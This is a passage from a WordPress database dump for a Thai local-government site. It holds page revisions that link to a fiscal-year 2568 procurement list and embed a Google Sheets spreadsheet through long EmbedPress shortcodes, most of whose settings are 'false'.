embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' height=\'700\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]</p>','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:27:44','2025-07-01 07:27:44','',1558,'http://pakhaeng.ssk.in.th/?p=1565',0,'revision','',0),
(1566,1,'2025-07-01 14:27:44','2025-07-01 07:27:44','<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<p>[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' height=\'700\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' 